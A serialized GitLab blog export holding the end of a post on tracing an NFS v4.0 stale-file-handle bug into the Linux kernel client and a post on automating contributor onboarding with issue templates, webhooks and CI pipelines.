Ruby](http://www.be9.io/2015/09/21/memory-leak/)\nby Oleg Dashevskii.\n\nMore importantly, this experience exemplifies how open source software\ndebugging has become a team sport that involves expertise across\nmultiple people, companies, and locations. 
The GitLab motto \"[everyone can\ncontribute](/company/mission/#mission)\" applies not only to GitLab itself, but also to other open\nsource projects, such as the Linux kernel.\n\n## Reproducing the bug\n\nWhile we have run NFS on GitLab.com for many years, we have stopped\nusing it to access repository data across our application\nmachines. Instead, we have [abstracted all Git calls to\nGitaly](/blog/the-road-to-gitaly-1-0/).\nStill, NFS remains a supported configuration for our customers who\nmanage their own installation of GitLab, but we had never seen the exact\nproblem described by the customer before.\n\n[Our customer gave us a few important clues](https://gitlab.com/gitlab-org/gitlab-ce/issues/51437):\n\n1. The full error message read, `fatal: Couldn't read ./packed-refs: Stale file handle`.\n2. The error seemed to start when they started a manual Git garbage\ncollection run via `git gc`.\n3. The error would go away if a system administrator ran `ls` in the\ndirectory.\n4. The error also would go away after `git gc` process ended.\n\nThe first two items seemed obviously related. When you push to a branch\nin Git, Git creates a loose reference, a fancy name for a file that\npoints your branch name to the commit. For example, a push to `master`\nwill create a file called `refs/heads/master` in the repository:\n\n```bash\n$ cat refs/heads/master\n2e33a554576d06d9e71bfd6814ee9ba3a7838963\n```\n\n`git gc` has several jobs, but one of them is to collect these loose\nreferences (refs) and bundle them up into a single file called\n`packed-refs`. This makes things a bit faster by eliminating the need to\nread lots of little files in favor of reading one large one. 
For\nexample, after running `git gc`, an example `packed-refs` might look\nlike:\n\n```\n# pack-refs with: peeled fully-peeled sorted\n564c3424d6f9175cf5f2d522e10d20d781511bf1 refs/heads/10-8-stable\nedb037cbc85225261e8ede5455be4aad771ba3bb refs/heads/11-0-stable\n94b9323033693af247128c8648023fe5b53e80f9 refs/heads/11-1-stable\n2e33a554576d06d9e71bfd6814ee9ba3a7838963 refs/heads/master\n```\n\nHow exactly is this `packed-refs` file created? To answer that, we ran\n`strace git gc` with a loose ref present. Here are the pertinent lines\nfrom that:\n\n```\n28705 open(\"/tmp/libgit2/.git/packed-refs.lock\", O_RDWR|O_CREAT|O_EXCL|O_CLOEXEC, 0666) = 3\n28705 open(\".git/packed-refs\", O_RDONLY) = 3\n28705 open(\"/tmp/libgit2/.git/packed-refs.new\", O_RDWR|O_CREAT|O_EXCL|O_CLOEXEC, 0666) = 4\n28705 rename(\"/tmp/libgit2/.git/packed-refs.new\", \"/tmp/libgit2/.git/packed-refs\") = 0\n28705 unlink(\"/tmp/libgit2/.git/packed-refs.lock\") = 0\n```\n\nThe system calls showed that `git gc` did the following:\n\n1. Open `packed-refs.lock`. This tells other processes that `packed-refs` is locked and cannot be changed.\n1. Open `packed-refs.new`.\n1. Write loose refs to `packed-refs.new`.\n1. Rename `packed-refs.new` to `packed-refs`.\n1. Remove `packed-refs.lock`.\n1. Remove loose refs.\n\nThe fourth step is the key here: the rename where Git puts `packed-refs`\ninto action. In addition to collecting loose refs, `git gc` also\nperforms a more expensive task of scanning for unused objects and\nremoving them. This task can take over an hour for large\nrepositories.\n\nThat made us wonder: for a large repository, does `git gc` keep the file\nopen while it's running this sweep? 
Looking at the `strace` logs and\nprobing the process with `lsof`, we found that it did the following:\n\n![Git Garbage Collection](https://about.gitlab.com/images/blogimages/nfs-debug/git-gc-diagram.svg)\n\nNotice that `packed-refs` is closed only at the end, after the potentially\nlong `Garbage collect objects` step takes place.\n\nThat made us wonder: how does NFS behave when one node has `packed-refs`\nopen while another renames over that file?\n\nTo experiment, we asked the customer to run the following experiment on\ntwo different machines (Alice and Bob):\n\n1. On the shared NFS volume, create two files: `test1.txt` and\n`test2.txt` with different contents to make it easy to distinguish them:\n\n    ```bash\n    alice $ echo \"1 - Old file\" > /path/to/nfs/test1.txt\n    alice $ echo \"2 - New file\" > /path/to/nfs/test2.txt\n    ```\n\n2. On machine Alice, keep a file open to `test1.txt`:\n\n    ```bash\n     alice $ irb\n     irb(main):001:0> File.open('/path/to/nfs/test1.txt')\n    ```\n\n3. On machine Alice, show the contents of `test1.txt` continuously:\n\n    ```bash\n    alice $ while true; do cat test1.txt; done\n    ```\n\n4. Then on machine Bob, run:\n\n    ```bash\n    bob $ mv -f test2.txt test1.txt\n    ```\n\nThis last step emulates what `git gc` does with `packed-refs` by\noverwriting the existing file.\n\nOn the customer's machine, the result looked something like:\n\n```\n1 - Old file\n1 - Old file\n1 - Old file\ncat: test1.txt: Stale file handle\n```\n\nBingo! We seemed to reproduce the problem in a controlled way. However,\nthe same experiment using a Linux NFS server did not have this\nproblem. The result was what you would expect: the new contents were\npicked up after the rename:\n\n```\n1 - Old file\n1 - Old file\n1 - Old file\n2 - New file  \u003C--- RENAME HAPPENED\n2 - New file\n2 - New file\n```\n\nWhy the difference in behavior? 
It turns out that the customer was using\nan [Isilon NFS\nappliance](https://www.dellemc.com/en-us/storage/isilon/index.htm) that\nonly supported NFS v4.0. By switching the mount parameters to v4.0 via\nthe `vers=4.0` parameter in `/etc/fstab`, the test revealed a different\nresult with the Linux NFS server:\n\n```\n1 - Old file\n1 - Old file\n1 - Old file\n1 - Old file \u003C--- RENAME HAPPENED\n1 - Old file\n1 - Old file\n```\n\nInstead of a `Stale file handle`, the Linux NFS v4.0 server showed stale\n*contents*. It turns out this difference in behavior can be explained by\nthe NFS spec. From [RFC\n3010](https://tools.ietf.org/html/rfc3010#page-153):\n\n> A filehandle may or may not become stale or expire on a rename.\n> However, server implementors are strongly encouraged to attempt to keep\n> file handles from becoming stale or expiring in this fashion.\n\nIn other words, NFS servers can choose how to behave if a file is\nrenamed; it's perfectly valid for any NFS server to return a `Stale file\nerror` when that happens. We surmised that even though the results were\ndifferent, the problem was likely related to the same issue. We\nsuspected some cache validation issue because running `ls` in the\ndirectory would \"clear\" the error. Now that we had a reproducible test\ncase, we asked the experts: the Linux NFS maintainers.\n\n## False path: NFS server delegations\n\nWith a clear set of reproduction steps, I [sent an email to the Linux\nNFS mailing list](https://marc.info/?l=linux-nfs&m=153721785231614&w=2)\ndescribing what we had found. Over the week, I went back and forth with\nBruce Fields, the Linux NFS server maintainer, who suggested this was a\nNFS bug and that it would be useful to look at the network traffic. He\nthought there might be an issue with NFS server delegations.\n\n### What is an NFS server delegation?\n\nIn a nutshell, NFS v4 introduced server delegations as a way to speed up file access. 
A server can\ndelegate read or write access to a client so that the client doesn't\nhave to keep asking the server whether that file has changed by another\nclient. In simpler terms, a write delegation is akin to someone lending\nyou a notebook and saying, \"Go ahead and write in here, and I'll take it\nback when I'm ready.\" Instead of having to ask to borrow the notebook\nevery time you want to write a new paragraph, you have free rein until\nthe owner reclaims the notebook. In NFS terms, this reclamation process\nis called a delegation recall.\n\nIndeed, a bug in the NFS delegation recall might explain the `Stale file\nhandle` problem. Remember that in the earlier experiment, Alice had\nan open file to `test1.txt` when it was replaced by `test2.txt` later.\nIt's possible that the server failed to recall the delegation on\n`test1.txt`, resulting in an incorrect state. To check whether this was\nan issue, we turned to `tcpdump` to capture NFS traffic and used\nWireshark to visualize it.\n\n[Wireshark](https://www.wireshark.org/) is a wonderful open source tool\nfor analyzing network traffic, and it's especially good for viewing NFS\nin action. We captured a trace using the following command on the NFS server:\n\n```\ntcpdump -s 0 -w /tmp/nfs.pcap port 2049\n```\n\nThis command captures all NFS traffic, which typically is on TCP port 2049.\nBecause our experiment worked properly with NFS v4.1 but did not\n with NFS v4.0, we could compare and contrast how NFS behaved\nin a non-working and a working case. With Wireshark, we saw the\nfollowing behavior:\n\n### NFS v4.0 (stale file case)\n\n![NFS v4.0 flow](https://about.gitlab.com/images/blogimages/nfs-debug/nfs-4.0-flow.svg)\n\nIn this diagram, we can see in step 1 Alice opens `test1.txt` and gets\nback an NFS file handle along with a `stateid` of 0x3000. 
When Bob\nattempts to rename the file, the NFS server tells to Bob to retry via\nthe `NFS4ERR_DELAY` message while it recalls the delegation from Alice\nvia the `CB_RECALL` message (step 3). Alice then returns her delegation\nvia `DELEGRETURN` (step 4), and then Bob attempts to send another\n`RENAME` message (step 5). The `RENAME` completes in both cases, but\nAlice continues to read using the same file handle.\n\n### NFS v4.1 (working case)\n\n![NFS v4.1 flow](https://about.gitlab.com/images/blogimages/nfs-debug/nfs-4.1-flow.svg)\n\nThe main difference happens at the bottom at step 6. Notice in NFS v4.0\n(the stale file case), Alice attempts to reuse the same `stateid`. In\nNFS v4.1 (working case), Alice performs an additional `LOOKUP` and\n`OPEN`, which causes the server to return a different `stateid`. In v4.0,\nthese extra messages are never sent. This explains why Alice continues\nto see stale content because she uses the old file handle.\n\nWhat makes Alice decide to do the extra `LOOKUP`? The delegation recall\nseemed to work fine, but perhaps there was still an issue, such as a\nmissing invalidation step. To rule that out, we disabled NFS delegations\nby issuing this command on the NFS server itself:\n\n```sh\necho 0 > /proc/sys/fs/leases-enable\n```\n\nWe repeated the experiment, but the problem persisted. All this\nconvinced us this wasn't a NFS server issue or a problem with NFS\ndelegations; it was a problem that led us to look into the NFS client\nwithin the kernel.\n\n## Digging deeper: the Linux NFS client\n\nThe first question we had to answer for the NFS maintainers:\n\n### Was this problem still in the latest upstream kernel?\n\nThe issue occurred with both CentOS 7.2 and Ubuntu 16.04 kernels, which\nused versions 3.10.0-862.11.6 and 4.4.0-130, respectively. 
However, both\nthose kernels lagged the most recent kernel, which was 4.19-rc2 at the\ntime.\n\nWe deployed a new Ubuntu 16.04 virtual machine on Google Cloud Platform\n(GCP), cloned the latest Linux kernel, and set up a kernel development\nenvironment. After generating a `.config` file via `make menuconfig`, we\nchecked two items:\n\n1. The NFS driver was compiled as a module (`CONFIG_NFSD=m`).\n2. The [required GCP kernel settings](https://cloud.google.com/compute/docs/images/building-custom-os)\nwere set properly.\n\nJust as a geneticist would use fruit flies to study evolution in\nreal time, the first item allowed us to make quick changes in the NFS\nclient without having to reboot the kernel. The second item was required\nto ensure that the kernel would actually boot after it was\ninstalled. Fortunately, the default kernel settings had all the settings\nright out of the box.\n\nWith our custom kernel, we verified that the stale file problem still\nexisted in the latest version. That begged a number of questions:\n\n1. Where exactly was this problem happening?\n2. Why was this problem happening with NFS v4.0 but not in v4.1?\n\nTo answer these questions, we began to investigate the NFS [source\ncode](/solutions/source-code-management/). Since we didn't have a kernel debugger available, we sprinkled the\nsource code with two main types of calls:\n\n1. `pr_info()` ([what used to be `printk`](https://lwn.net/Articles/487437/)).\n2. 
`dump_stack()`: This would show the stack trace of the current function call.\n\nFor example, one of the first things we did was hook into the\n`nfs4_file_open()` function in `fs/nfs/nfs4file.c`:\n\n```c\nstatic int\nnfs4_file_open(struct inode *inode, struct file *filp)\n{\n...\n        pr_info(\"nfs4_file_open start\\n\");\n        dump_stack();\n```\n\nAdmittedly, we could have [activated the `dprintk` messages with the\nLinux dynamic\ndebug](https://www.kernel.org/doc/html/v4.15/admin-guide/dynamic-debug-howto.html)\nor used\n[`rpcdebug`](https://www.thegeekdiary.com/how-to-enable-nfs-debug-logging-using-rpcdebug/),\nbut it was nice to be able to add our own messages to verify changes\nwere being made.\n\nEvery time we made changes, we recompiled the module and reinstalled it\ninto the kernel via the commands:\n\n```sh\nmake modules\nsudo umount /mnt/nfs-test\nsudo rmmod nfsv4\nsudo rmmod nfs\nsudo insmod fs/nfs/nfs.ko\nsudo mount -a\n```\n\nWith our NFS module installed, repeating the experiments would print\nmessages that would help us understand the NFS code a bit more. For\nexample, you can see exactly what happens when an application calls `open()`:\n\n```\nSep 24 20:20:38 test-kernel kernel: [ 1145.233460] Call Trace:\nSep 24 20:20:38 test-kernel kernel: [ 1145.233462]  dump_stack+0x8e/0xd5\nSep 24 20:20:38 test-kernel kernel: [ 1145.233480]  nfs4_file_open+0x56/0x2a0 [nfsv4]\nSep 24 20:20:38 test-kernel kernel: [ 1145.233488]  ? nfs42_clone_file_range+0x1c0/0x1c0 [nfsv4]\nSep 24 20:20:38 test-kernel kernel: [ 1145.233490]  do_dentry_open+0x1f6/0x360\nSep 24 20:20:38 test-kernel kernel: [ 1145.233492]  vfs_open+0x2f/0x40\nSep 24 20:20:38 test-kernel kernel: [ 1145.233493]  path_openat+0x2e8/0x1690\nSep 24 20:20:38 test-kernel kernel: [ 1145.233496]  ? mem_cgroup_try_charge+0x8b/0x190\nSep 24 20:20:38 test-kernel kernel: [ 1145.233497]  do_filp_open+0x9b/0x110\nSep 24 20:20:38 test-kernel kernel: [ 1145.233499]  ? 
__check_object_size+0xb8/0x1b0\nSep 24 20:20:38 test-kernel kernel: [ 1145.233501]  ? __alloc_fd+0x46/0x170\nSep 24 20:20:38 test-kernel kernel: [ 1145.233503]  do_sys_open+0x1ba/0x250\nSep 24 20:20:38 test-kernel kernel: [ 1145.233505]  ? do_sys_open+0x1ba/0x250\nSep 24 20:20:38 test-kernel kernel: [ 1145.233507]  __x64_sys_openat+0x20/0x30\nSep 24 20:20:38 test-kernel kernel: [ 1145.233508]  do_syscall_64+0x65/0x130\n```\n\nWhat are the `do_dentry_open` and `vfs_open` calls above? Linux has a\n[virtual filesystem\n(VFS)](https://www.kernel.org/doc/Documentation/filesystems/vfs.txt), an\nabstraction layer which provides a common interface for all\nfilesystems. The VFS documentation explains:\n\n> The VFS implements the open(2), stat(2), chmod(2), and similar system\n> calls. The pathname argument that is passed to them is used by the VFS\n> to search through the directory entry cache (also known as the dentry\n> cache or dcache). This provides a very fast look-up mechanism to\n> translate a pathname (filename) into a specific dentry. Dentries live\n> in RAM and are never saved to disc: they exist only for performance.\n\n### This gave us a clue: what if this was a problem with the dentry cache?\n\nWe noticed a lot of dentry cache validation was done in\n`fs/nfs/dir.c`. In particular, `nfs4_lookup_revalidate()` sounded\npromising. 
As an experiment, we hacked that function to bail\nout early:\n\n\n```diff\ndiff --git a/fs/nfs/dir.c b/fs/nfs/dir.c\nindex 8bfaa658b2c1..ad479bfeb669 100644\n--- a/fs/nfs/dir.c\n+++ b/fs/nfs/dir.c\n@@ -1159,6 +1159,7 @@ static int nfs_lookup_revalidate(struct dentry *dentry, unsigned int flags)\n        trace_nfs_lookup_revalidate_enter(dir, dentry, flags);\n        error = NFS_PROTO(dir)->lookup(dir, &dentry->d_name, fhandle, fattr, label);\n        trace_nfs_lookup_revalidate_exit(dir, dentry, flags, error);\n+       goto out_bad;\n        if (error == -ESTALE || error == -ENOENT)\n                goto out_bad;\n        if (error)\n```\n\nThat made the stale file problem in our experiment go away! Now we were onto something.\n\nTo answer, \"Why does this problem not happen in NFS v4.1?\", we added\n`pr_info()` calls to every `if` block in that function. After running our\nexperiments with NFS v4.0 and v4.1, we found this special condition being run\nin the v4.1 case:\n\n```c\n        if (NFS_SB(dentry->d_sb)->caps & NFS_CAP_ATOMIC_OPEN_V1) {\n          goto no_open;\n        }\n```\n\nWhat is `NFS_CAP_ATOMIC_OPEN_V1`? We saw [this kernel\npatch](https://patchwork.kernel.org/patch/2300511/) mentioned this was\nan NFS v4.1-specific feature, and the code in `fs/nfs/nfs4proc.c`\nconfirmed that this flag was a capability present in v4.1 but not in v4.0:\n\n```c\nstatic const struct nfs4_minor_version_ops nfs_v4_1_minor_ops = {\n        .minor_version = 1,\n        .init_caps = NFS_CAP_READDIRPLUS\n                | NFS_CAP_ATOMIC_OPEN\n                | NFS_CAP_POSIX_LOCK\n                | NFS_CAP_STATEID_NFSV41\n                | NFS_CAP_ATOMIC_OPEN_V1\n```\n\nThat explained the difference in behavior: in the v4.1 case, the `goto\nno_open` would cause more validation to happen in\n`nfs_lookup_revalidate()`, but in v4.0, the `nfs4_lookup_revalidate()`\nwould return earlier. 
Now, how do we actually solve the problem?\n\n## The solution\n\nI reported the [findings to the NFS mailing\nlist](https://marc.info/?l=linux-nfs&m=153782129412452&w=2) and proposed\n[a naive patch](https://marc.info/?l=linux-nfs&m=153807208928650&w=2). A\nweek after the report, Trond Myklebust sent a [patch series to the list\nfixing this bug and found another related issue for NFS\nv4.1](https://marc.info/?l=linux-nfs&m=153816500525563&w=2).\n\nIt turns out the fix for the NFS v4.0 bug was deeper in the code base\nthan we had looked. Trond summarized it well in the\n[patch](https://marc.info/?l=linux-nfs&m=153816500525564&w=2):\n\n> We need to ensure that inode and dentry revalidation occurs correctly\n> on reopen of a file that is already open. Currently, we can end up not\n> revalidating either in the case of NFSv4.0, due to the 'cached open'\n> path.  Let's fix that by ensuring that we only do cached open for the\n> special cases of open recovery and delegation return.\n\nWe confirmed that this fix made the stale file problem go away and filed\nbug reports with\n[Ubuntu](https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1802585)\nand [RedHat](https://bugzilla.redhat.com/show_bug.cgi?id=1648482).\n\nKnowing full well that kernel changes may take a while to make it to\nstable releases, we also added a [workaround in\nGitaly](https://gitlab.com/gitlab-org/gitaly/merge_requests/924) to deal\nwith this issue. We did experiments to test that calling `stat()` on the\n`packed-refs` file appears to cause the kernel to revalidate the dentry\ncache for the renamed file. For simplicity, this is implemented in\nGitaly regardless of whether the filesystem is NFS; we only do this once\nbefore Gitaly \"opens\" a repository, and there are already other `stat()`\ncalls that check for other files.\n\n## What we learned\n\nA bug can be anywhere in your software stack, and sometimes you have to\nlook beyond your application to find it. 
Having helpful partners in the\nopen source world makes that job much easier.\n\nWe are extremely grateful to Trond Myklebust for fixing the problem, and\nBruce Fields for responding to questions and helping us understand\nNFS. Their responsiveness and professionalism truly reflects the best of\nthe open source community.\n\nPhoto by [dynamosquito](https://www.flickr.com/photos/dynamosquito) on [Flickr](https://www.flickr.com/photos/dynamosquito/4265771518)\n{: .note}\n",[267,751,803,9],{"slug":3271,"featured":6,"template":689},"how-we-spent-two-weeks-hunting-an-nfs-bug","content:en-us:blog:how-we-spent-two-weeks-hunting-an-nfs-bug.yml","How We Spent Two Weeks Hunting An Nfs Bug","en-us/blog/how-we-spent-two-weeks-hunting-an-nfs-bug.yml","en-us/blog/how-we-spent-two-weeks-hunting-an-nfs-bug",{"_path":3277,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3278,"content":3281,"config":3289,"_id":3291,"_type":14,"title":3292,"_source":16,"_file":3293,"_stem":3294,"_extension":19},"/en-us/blog/how-we-use-gitlab-to-grow-open-source-communities",{"noIndex":6,"title":3279,"description":3280},"How we use GitLab to grow open source communities","Learn how to use the DevSecOps platform to solve onboarding problems for new contributors.",{"title":3279,"description":3280,"body":3282,"authors":3283,"heroImage":3286,"category":10,"tags":3287,"date":3288},"\nGitLab's Contributor Success team faced a challenge.\nWhile our returning open source contributors were merging more code changes and collaborating on deeper features, first-time contributors were struggling to get started. We knew many newcomers to open source often gave up or never asked for help. But as advocates for [GitLab's mission](https://handbook.gitlab.com/handbook/company/mission/)\nto enable everyone to contribute, we wanted to do better.\n\nWe started running research studies on open source contributors to GitLab. Then we improved the stumbling blocks. 
In January, we achieved a record of 184 unique community contributors to GitLab in a single month,\nexceeding our team target of 170 for the first time.\n\nThree months later, we broke it again with 192.\n\nHere's how we used GitLab's own tools to solve the newcomer dilemma and grow our open source community.\n\n## What we learned studying first-time contributors\n\nIn 2023, we conducted the first-ever user study of GitLab open source contributors.\nWe watched six participants who had never contributed to GitLab make their first attempt. They completed diary studies and Zoom interviews detailing their experience.\n\nParticipants told us:\n\n* The contributor documentation was confusing\n* Getting started felt overwhelming\n* It wasn't clear how or where to find help\n\nOnly one out of the six participants successfully merged a code contribution to GitLab during the study.\n\nIt became clear we needed to focus on the onboarding experience if we wanted new contributors to succeed.\nSo we [iterated](https://handbook.gitlab.com/handbook/values/#iteration)!\n\nOur team spent the next year addressing their challenges. We used GitLab tools,\nsuch as issue templates, scheduled pipelines, webhooks, and the GitLab Query Language (GLQL), to build an innovative semi-automated onboarding solution.\n\nIn 2025, we performed a follow-up user study with new participants who had never made a contribution to GitLab. All 10 participants successfully created and merged contributions to GitLab, a 100% success rate. 
The feedback showed a great appreciation for the new onboarding process, the speed at which\nmaintainers checked in on contributors, and the recognition we offered to contributors.\n\nEven better, participants shared how much fun they had contributing:\n\"I felt a little rush of excitement at being able to say 'I helped build GitLab.'\"\n\n## We built personal onboarding with GitLab\n\nOur solution started with engagement.\nTo help newcomers get started, we introduced a personal onboarding process connecting each\ncontributor with a community maintainer.\n\nWe created an [issue template](https://gitlab.com/gitlab-community/meta/-/blob/ac0e5579a6a1cf26e367010bfcf6c7d35b38d4f8/.gitlab/issue_templates/Onboarding.md) with a clear checklist of tasks.\n\nThe onboarding issue also handles access approval for the\n[GitLab community forks](https://about.gitlab.com/blog/gitlab-community-forks/),\na collection of shared projects that make it easier to push changes, collaborate with others,\nand access GitLab Ultimate and Duo features.\n\nUsing [scoped labels](https://docs.gitlab.com/user/project/labels/#scoped-labels), we indicate the status of the access request for easy maintainer follow-ups.\n\n![GitLab onboarding issue](https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512804/vkiyl0hrfbgcer3nz38r.png)\n\nWe started with a Ruby script run via a [scheduled pipeline](https://docs.gitlab.com/ci/pipelines/schedules/),\nchecking for new access requests and using the issue template to create personalized onboarding issues.\n\nFrom here, our maintainers engage with new contributors to verify access, answer questions, and find issues.\n\n## We standardized responses with comment templates\n\nWith multiple maintainers in the GitLab community, we wanted to ensure consistent and clear messaging.\n\nWe created [comment templates](https://docs.gitlab.com/user/profile/comment_templates/),\nwhich we sync with the repository using the GraphQL API and a\n[Ruby 
script](https://gitlab.com/gitlab-community/meta/-/blob/dd6e0c2861c848251424b72e3e8c5603dcaac725/bin/sync_comment_templates.rb).\n\nThe script is triggered in `.gitlab-ci.yml` when comment template changes are pushed\nto the default branch (a dry run is triggered in merge requests).\n\n```yaml\nexecute:sync-comment-templates:\n  stage: execute\n  extends: .ruby\n  script:\n    - bundle exec bin/sync_comment_templates.rb\n  variables:\n    SYNC_COMMENT_TEMPLATES_GITLAB_API_TOKEN: $SYNC_COMMENT_TEMPLATES_GITLAB_API_TOKEN_READ_ONLY\n  rules:\n    - if: $CI_PIPELINE_SOURCE == 'schedule' || $CI_PIPELINE_SOURCE == \"trigger\"\n      when: never\n    - if: $EXECUTE_SYNC_COMMENT_TEMPLATES == '1'\n    - if: $CI_MERGE_REQUEST_IID\n      changes:\n        - .gitlab/comment_templates/**/*\n      variables:\n        REPORT_ONLY: 1\n    - if: $CI_COMMIT_REF_NAME == $CI_DEFAULT_BRANCH\n      changes:\n        - .gitlab/comment_templates/**/*\n      variables:\n        FORCE_SYNC: 1\n        DRY_RUN: 0\n        SYNC_COMMENT_TEMPLATES_GITLAB_API_TOKEN: $SYNC_COMMENT_TEMPLATES_GITLAB_API_TOKEN_READ_WRITE\n```\n\n\n\n![GitLab comment template](https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512803/qmfaymqhq3zgdcnm6a3j.png)\n\n\n\n## We eliminated the 5-minute wait time\n\nOur first iteration was a little slow.\nAfter starting the onboarding process, contributors wondered what to do next while the scheduled\npipeline took up to 5 minutes to create their onboarding issue.\nFive minutes feels like forever when you have the momentum to dive in.\n\n[Niklas](https://gitlab.com/Taucher2003), a member of our [Core team ](https://about.gitlab.com/community/core-team/), built a solution.\nHe added [webhook events for access requests](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/163094)\nand [custom payload templates for webhooks](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/142738).\n\nThese features together allowed us to trigger a pipeline immediately instead 
of waiting for the schedule.\nThis reduces the time to roughly 40 seconds (the time it takes for the CI pipeline to run)\nand generates the onboarding issue right away. It also saves thousands of wasted pipelines and compute minutes when no access requests actually need processing.\n\nWe set up a [pipeline trigger token](https://docs.gitlab.com/ci/triggers/#create-a-pipeline-trigger-token)\nand used this as the target for the webhook, passing the desired environment variables:\n\n```json\n{\n  \"ref\": \"main\",\n  \"variables\": {\n    \"EXECUTE_ACCESS_REQUESTS\": \"1\",\n    \"DRY_RUN\": \"0\",\n    \"PIPELINE_NAME\": \"Create onboarding issues\",\n    \"GROUP_ID\": \"{{group_id}}\",\n    \"EVENT_NAME\": \"{{event_name}}\"\n  }\n}\n```\n\n![Pipeline list](https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512805/qom7hnqnwfcdzvria7dd.png)\n\n## We automated follow-ups\n\nWith an increasing volume of customers and community contributors onboarding to the GitLab community,\nmaintainers struggled to track which issues needed attention and some follow-up questions got lost.\n\nWe built automation leveraging webhooks and Ruby to label issues updated by community members.\nThis creates a clear signal of issue status for maintainers.\n\n[GitLab Triage](https://gitlab.com/gitlab-org/ruby/gems/gitlab-triage)\nautomatically nudges idle onboarding issues to ensure we maintain contributor momentum.\n\n![Automated nudge for idle GitLab onboarding issues](https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512811/gkj3qaidjl1vv2dlu8ep.png)\n\n## We organized issue tracking with GLQL\n\nWe built a [GLQL view](https://docs.gitlab.com/user/glql/) to keep track of issues.\nThis GLQL table summarizes onboarding issues which need attention,\nso maintainers can review and follow up with community members.\n\n![GLQL view of issue tracking](https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512804/hdduf0orntdfhkysheae.png)\n\nThese GLQL views improved our 
overall triage [efficiency](https://handbook.gitlab.com/handbook/values/#efficiency).\nIt was so successful we ended up using this strategy within the [GitLab for Open Source](https://about.gitlab.com/solutions/open-source/)\nand [GitLab for Education](https://about.gitlab.com/solutions/education/) programs, too.\nWith GLQL tables for support issues, these community programs lowered their response times by 75%.\n\n## We made the README findable\n\nThe [@gitlab-community group](https://gitlab.com/gitlab-community/)\nis the home for contributors on Gitlab.com.\nWe already had a `README.md` file explaining the community forks and onboarding process, but this file\nlived in our meta project.\nWith our follow-up user study, we discovered this was a point of confusion for newcomers when their\nonboarding issues were under a different project.\n\nWe used [GitLab's project mirroring](https://docs.gitlab.com/user/project/repository/mirror/)\nto solve this and mirrored the meta project to `gitlab-profile`.\nThis surfaced the existing README file at the group level, making it easier to discover.\n\n![GitLab project mirroiring](https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512809/kbgdxyilza71kmj0aeqt.png)\n\n![Group README](https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512804/taosgn8vvgo8onszuwaf.png)\n\n## The results speak for themselves\n\nBy dogfooding GitLab, we improved the stumbling blocks found in our research studies\nand transformed the GitLab contributor journey.\nWe have grown the number of customers and community members contributing to GitLab,\nadding features to the product, solving bugs, and adding to our CI/CD catalog.\n\nOur onboarding process has increased the rate newcomers join the community, and our total number of\ncontributors on the community forks has doubled over the last 9 months.\n\n![Community forks growth chart](https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512803/xagra4vfsrhbcwnzekmp.png)\n\nWe 
reduced the time it takes for newcomers to make their first contribution by connecting them\nwith maintainers faster and supporting them in getting started.\nWe use [GitLab's value stream analytics](https://docs.gitlab.com/user/group/value_stream_analytics/)\nto track our response rates.\n\n* First response time from community maintainers is down to 46 minutes over the last 3 months\n* Average approval time for community forks access is down to 1 hour over the last 3 months\n\n![Value stream analytics timeline](https://res.cloudinary.com/about-gitlab-com/image/upload/v1752512812/jzksakrfdb22hooqemzh.png)\n\nThe 100% success rate of our 2025 user study confirmed these improvements for our first-time contributors.\n\n## We invested time savings into contributor recognition\n\nFixing these newcomer challenges allowed us more capacity to focus on better recognition of\ncontributors, incentivizing first-timers to keep coming back.\nThe result is [contributors.gitlab.com](https://contributors.gitlab.com/).\nWe built out a central hub for our contributors that features gamified leaderboards,\nachievements, and rewards.\nContributors can see their impact, track progress, and grow in the community.\n\n## Sharing what we learned\n\nThese improvements work and are repeatable for other open source projects.\nWe are sharing our approach across communities and conferences so that other projects can consider using these tools to grow.\n\nAs more organizations learn the barriers to participation, we can create a more welcoming open source environment.\nWith these GitLab tools, we can offer a smoother experience for both contributors and maintainers.\nWe're committed to advancing this work and collaborating to remove barriers for open source projects everywhere.\n\n## Start the conversation\n\nWant to learn more about growing your contributor community?\nEmail `contributors@gitlab.com` or [open an 
issue](https://gitlab.com/gitlab-org/developer-relations/contributor-success/team-task/-/issues)\nto start a discussion.\nWe're here to help build communities.",[3284,3285],"Lee Tickett","Daniel Murphy","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099558/Blog/Hero%20Images/Blog/Hero%20Images/gitlabflatlogomap_gitlabflatlogomap.png_1750099558369.png",[9,267,1495],"2025-07-15",{"featured":6,"template":689,"slug":3290},"how-we-use-gitlab-to-grow-open-source-communities","content:en-us:blog:how-we-use-gitlab-to-grow-open-source-communities.yml","How We Use Gitlab To Grow Open Source Communities","en-us/blog/how-we-use-gitlab-to-grow-open-source-communities.yml","en-us/blog/how-we-use-gitlab-to-grow-open-source-communities",{"_path":3296,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3297,"content":3303,"config":3309,"_id":3311,"_type":14,"title":3312,"_source":16,"_file":3313,"_stem":3314,"_extension":19},"/en-us/blog/how-we-used-gitlab-values-to-build-a-security-awards-program",{"title":3298,"description":3299,"ogTitle":3298,"ogDescription":3299,"noIndex":6,"ogImage":3300,"ogUrl":3301,"ogSiteName":673,"ogType":674,"canonicalUrls":3301,"schema":3302},"How we used GitLab values to develop a successful Security Awards Program","We built a program that encourages, recognizes, and awards a shared responsibility for security.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681989/Blog/Hero%20Images/security-awards-blog.png","https://about.gitlab.com/blog/how-we-used-gitlab-values-to-build-a-security-awards-program","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How we used GitLab values to develop a successful Security Awards Program\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Philippe Lafoucrière\"}],\n        \"datePublished\": \"2021-05-14\",\n      
